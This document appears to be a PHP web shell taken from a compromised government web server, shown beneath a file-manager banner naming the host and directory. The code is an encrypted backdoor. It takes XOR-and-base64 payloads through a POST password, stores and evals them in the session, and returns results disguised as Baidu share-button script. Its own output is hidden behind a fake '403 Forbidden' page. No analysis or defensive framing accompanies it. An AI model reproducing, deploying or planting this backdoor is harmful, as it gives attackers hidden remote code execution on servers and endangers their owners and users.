|
Server : Apache/2.2.2 (Fedora) System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686 User : apache ( 48) PHP Version : 5.2.9 Disable Function : NONE Directory : /var/www/html/crontab/ |
Upload File : |
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D, $K){
for ($i = 0; $i < strlen($D); $i++) {
$c = $K[$i + 1 & 15];
$D[$i] = $D[$i] ^ $c;
}
return $D;
}
$pass = 'info';
$payloadName = 'payload';
$key = 'e9eb46ef49167165';
if (isset($_POST[$pass])) {
$data = encode(base64_decode($_POST[$pass]), $key);
if (isset($_SESSION[$payloadName])) {
$payload = encode($_SESSION[$payloadName], $key);
if (strpos($payload, "getBasicsInfo") === false) {
$payload = encode($payload, $key);
}
eval($payload);
$left = substr(md5($pass . $key), 0, 5);
$replacedString = str_replace("bdsek", $left, "var Rebdsek_config=");
header('Content-Type: text/html');
echo '<!DOCTYPE html>';
echo '<html lang="en">';
echo '<head>';
echo '<meta charset="UTF-8">';
echo '<title>GetConfigKey</title>';
echo '</head>';
echo '<body>';
echo '<script>';
echo '<!-- Baidu Button BEGIN';
echo '<script type="text/javascript" id="bdshare_js" data="type=slide&img=8&pos=right&uid=6537022" ></script>';
echo '<script type="text/javascript" id="bdshell_js"></script>';
echo '<script type="text/javascript">';
echo $replacedString;
echo base64_encode(encode(@run($data),$key));
echo ";";
echo 'document.getElementById("bdshell_js").src = "http://google.com/static/js/shell_v2.js?cdnversion=" + Math.ceil(new Date()/3600000);';
echo '</script>';
echo '-->';
echo '</script>';
echo '</body>';
echo '</html>';
} else {
if (strpos($data, "getBasicsInfo") !== false) {
$_SESSION[$payloadName] = encode($data, $key);
}
}
}
?>
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access thgs resource.</p>
</body></html>